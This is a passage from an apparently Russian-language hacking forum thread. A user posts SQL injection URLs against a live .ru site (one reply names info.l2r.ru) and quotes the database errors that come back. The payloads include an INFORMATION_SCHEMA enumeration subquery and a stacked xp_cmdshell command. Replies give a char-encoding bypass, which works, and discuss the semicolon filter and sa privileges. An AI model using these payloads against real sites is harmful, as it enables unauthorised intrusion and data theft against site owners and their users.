http://***.***.ru/?id=1%20or%201=(select%20TOP%201%20COLUMN_NAME%20F ROM%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_N AME='henna')--

ошибка: message: Invalid column name 'henna'. (severity 16)
че так плохо?

заэнкодь henna в чар

заработала, спс.

вот теперь другое интересует
http://***.***.ru/?id=1;exec%20master..xp_cmdshell%20'dir%20c:\'--

Conversion failed when converting the varchar value '1exec master..xp_cmdshell dir c:' to data type int. (severity 16)

Incorrect syntax near 'xec'.

он ; вообще невидит, фильтрует походу, чето можно сделать?


еще интересно как пользоваться http://www.hack-shop.org.ru/tools-mssql-exractor
видел тут видео было, но ссылка здохла( обьясните плз!

info.l2r.ru?
там ни одной таблицы с рег данными нет

та я попрактиковаться хочу с MSSQL, никогда не ломал! поэтому и интересуюсь.

а сайт ты правильно подметил) как нашёл? :)
+ если ; как то сделать то можно заюзать xp_cmdshell или еще что-то.
подскажите как

Там, что база запущена под sa?
Сомневаюсь , а в остальных случаях 99% на эти команды у тебя прав не хватит